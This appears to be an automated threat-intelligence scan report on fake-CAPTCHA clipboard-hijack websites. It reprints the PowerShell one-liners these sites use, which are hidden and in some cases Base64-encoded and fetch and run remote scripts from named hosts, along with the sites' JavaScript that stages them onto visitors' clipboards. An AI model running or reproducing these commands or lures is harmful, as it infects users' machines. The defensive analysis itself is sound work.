Threat Intelligence Report
22
Total Sites Analyzed
7
Malicious Sites
32.0% detection rate
10
PowerShell Commands
24
Clipboard Hijacks
163
Avg Threat Score
Attack Pattern Analysis
9
High Risk Commands
31
Base64 Encoded
0
Obfuscated JS
11
Inline JS Redirects
3
External JS Chains
14
Redirect Follows
Top Indicators/Keywords
robot (6)
hidden (6)
CAPTCHA Verification (4)
I am not a robot (4)
Robot (4)
Verification (4)
verification (4)
verification-id (4)
To better prove you are not a robot (4)
Verification ID (3)
verification_id (2)
iex (2)
exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator) (2)
exec( (2)
cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`; (2)
Malicious Sites Detected
Click on a site to view detailed analysishttps://travellerschoice.ae
73 indicators detected
Score: 618
PowerShell
Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk
๐ป PowerShell Commands 2
powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object
๐ Suspicious Keywords 21
cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
๐ Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
๐ Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://ace-batiment.com
73 indicators detected
Score: 618
PowerShell
Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk
๐ป PowerShell Commands 2
powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object
๐ Suspicious Keywords 21
cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot
๐ Extracted URLs 5
https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`
๐ Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://sotavpn.shop
55 indicators detected
Score: 554
Clipboard Hijack
Fake CAPTCHA
4
clipboard
1
captcha
12
base64
1
redirects
3
redirect chains
3
redirect follows
4
suspicious keywords
๐ Suspicious Keywords 4
Robot
robot
Verify you are human
hidden
๐ Extracted URLs 5
https://api.ipify.org?format=json
https://www.cloudflare.com/products/turnstile/?utm_source=turnstile&utm_campaign=widget
https://www.cloudflare.com/privacypolicy/
https://www.cloudflare.com/ru-ru/website-terms/
https://ads.bravvoks.com/3a049e5/postback?subid=${encodeURIComponent
๐ Clipboard Manipulation Code
Showing first 2 of 4 entries (truncated for performance)
...pboard && window.isSecureContext) { await navigator.clipboard.writeText(text); return true; } } catch (e...
...appendChild(ta); ta.select(); try { document.execCommand("copy"); document.body.removeChild(ta); retu...
๐ External JavaScript Redirect Chains
Showing first 2 of 3 chains (truncated for performance)
Script: https://sotavpn.shop/js/c.js
Type: script_src
Destination (first appearance): https://cdn.tynt.com/tc.js
ar t=document.createElement("script");t.async="async";t.type="text/javascript";t.src="https://cdn.tynt.com/tc.js";e.parentNode.insertBefore(t,e)})()}}}(function(){if(WAU_lrd()){if(typeof _wau_oScript: https://sotavpn.shop/js/c.js
Type: script_src
Destination (first appearance): https://t.dtscout.com/i/?l=
fbase"in _wau_opt)&&!("fd"in _wau_opt)){var e=document.createElement("script");e.src="https://t.dtscout.com/i/?l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);e.async="async";e.type="text/javascript"โฆ๐ฐ๏ธ Redirect Follower Findings (3)
Source: external_js
Method: script_src
Original: https://cdn.tynt.com/tc.js
Final: https://cdn.tynt.com/tc.js
ar t=document.createElement("script");t.async="async";t.type="text/javascript";t.src="https://cdn.tynt.com/tc.js";e.parentNode.insertBefore(t,e)})()}}}(function(){if(WAU_lrd()){if(typeof _wau_oStatus: ok
//v187 Copyright (c) 2008-2025 33Across Inc. All Rights Reserved
Tynt=window.Tynt||[];
"undefined"==typeof Tynt.TIL&&"undefined"==typeof Tynt.TCL&&"undefined"==typeof Tynt.TICFL&&function(){var e=window,k=document,h={distro:"TC",id:"TC-"+(new Date).getTime()};Tynt.TCL=function(){if(document.body){Date.now||(Date.now=function(){return(new Date).getTime()});var d={_maxRef:600,_idMacro:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",init:function(){this._icUrl=h.protocol+(Tynt.e||"")+"ic.tynt... [truncated]Source: external_js
Method: script_src
Original: https://t.dtscout.com/i/?l=
Final: https://t.dtscout.com/i/?l=
fbase"in _wau_opt)&&!("fd"in _wau_opt)){var e=document.createElement("script");e.src="https://t.dtscout.com/i/?l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);e.async="async";e.type="text/javascript"โฆStatus: ok
(function() {
var dc = {};
var gu = false;
var su = "51A01765680751782C78994DA5F1E691";
var gm = false;
var cn = "__dtsu";
var lg = {cv:"US",cs:"C",rv:"VA",rs:"C"};
String.prototype.dts_hash_code=function(){var hash=0;if(this.length==0)return hash;for(i=0;i<this.length;i++){char=this.charCodeAt(i);hash=((hash<<5)-hash)+char;hash=hash&hash} return hash;};
function _dtsi() {
a = document.createElement("a"), a.href = window.location.href, _dts.host = a.host... [truncated]Source: external_js
Method: location_assignment
Original: https://whos.amung.us/stats/
Final: https://whos.amung.us/stats/
tps://whos.amung.us/stats/"+key+"/",_wau_opt.target)}}else{e.onclick=function(){top.location="https://whos.amung.us/stats/"+key+"/"}}if(async_index>=0){var s=document.getElementById("_wau"+_wau[async_index][2]);s.parentNode.insertBefore(e,sโฆStatus: ok
<!doctype html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<!-- Title -->
<title>whos.amung.us - dashboard » sample stats page</title>
<meta name="theme-color" content="#d73f3e" />
<meta http-equiv="Content-Type" cont... [truncated]https://www.bratusferramentas.grupomoltz.com.br/
42 indicators detected
Score: 371
PowerShell
Clipboard Hijack
3
powershell
5
clipboard
7
captcha
3
base64
1
redirect follows
13
suspicious keywords
3
high risk
๐ป PowerShell Commands 3
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing)
iwr
๐ Suspicious Keywords 13
CAPTCHA Verification
Verification ID
I am not a robot
robot
Robot
Verification
verification
verification-id
verification_id
Verify You Are Human
๐ Extracted URLs 2
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
๐ Clipboard Manipulation Code
Showing first 2 of 4 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "รขย ''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {...
๐ฐ๏ธ Redirect Follower Findings (1)
Source: inline_js
Method: base64_payload
iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content
Status: error: HTTPSConnectionPool(host='amazon-ny-gifts.com', port=443): Max retries exceeded with url: /shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt (Caused by NameResolutionError("HTTPSConnection(host
https://blessdayservices.org/up/
40 indicators detected
Score: 309
PowerShell
Clipboard Hijack
3
powershell
5
clipboard
1
downloads
4
captcha
13
suspicious keywords
2
high risk
๐ป PowerShell Commands 3
powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";
powershell " + htaPath;
iwr
๐ Suspicious Keywords 13
CAPTCHA Verification
Verification Hash
I am not a robot
Robot
robot
Verification
verification
verification-id
verification_id
To better prove you are not a robot
๐ Extracted URLs 5
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1
๐ Clipboard Manipulation Code
Showing first 2 of 4 entries (truncated for performance)
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA...
...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "รขย ''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()...
https://82.146.62.232/
47 indicators detected
Score: 307
Fake CAPTCHA
Redirect Chain
3
captcha
6
base64
1
redirects
1
redirect follows
4
suspicious keywords
๐ Suspicious Keywords 4
exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)
robot
exec(
hidden
๐ Extracted URLs 15
https://svetvip.ru/
https://api.whatsapp.com/send?phone=79258627909
https://api.whatsapp.com/send?phone=79258627909
https://svetvip.ru/catalog/vstraivaemye_svetilniki/
https://svetvip.ru/catalog/trekovye_i_shinnye_svetilniki/
๐ฐ๏ธ Redirect Follower Findings (1)
Source: inline_js
Method: script_src
new Image().src='https://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5Njc4NDczMQEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAFmZTEyY2I3YTMxYjU3ZWFmOTlkOTZkODIyMWRjNmVkZQExNzk2Nzg0NzMxAS8BAQEC&k=5af0137b18b2317165adf952629fe9df';
Status: ok
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access this resource.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at svetvip.ru Port 80</address> </body></html>
http://82.146.62.232/
47 indicators detected
Score: 307
Fake CAPTCHA
Redirect Chain
3
captcha
6
base64
1
redirects
1
redirect follows
4
suspicious keywords
๐ Suspicious Keywords 4
exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)
robot
exec(
hidden
๐ Extracted URLs 15
https://svetvip.ru/
https://api.whatsapp.com/send?phone=79258627909
https://api.whatsapp.com/send?phone=79258627909
https://svetvip.ru/catalog/vstraivaemye_svetilniki/
https://svetvip.ru/catalog/trekovye_i_shinnye_svetilniki/
๐ฐ๏ธ Redirect Follower Findings (1)
Source: inline_js
Method: script_src
new Image().src='http://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5Njc4NDczOQEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAFhN2E0ODhmOWE5OWYyMDhkNjJhNjA5MDNjMWMxMTM4MwExNzk2Nzg0NzM5AS8BAQEC&k=750a2e6a143b6eef7475b5bd9d0d308e';
Status: ok
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access this resource.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at svetvip.ru Port 80</address> </body></html>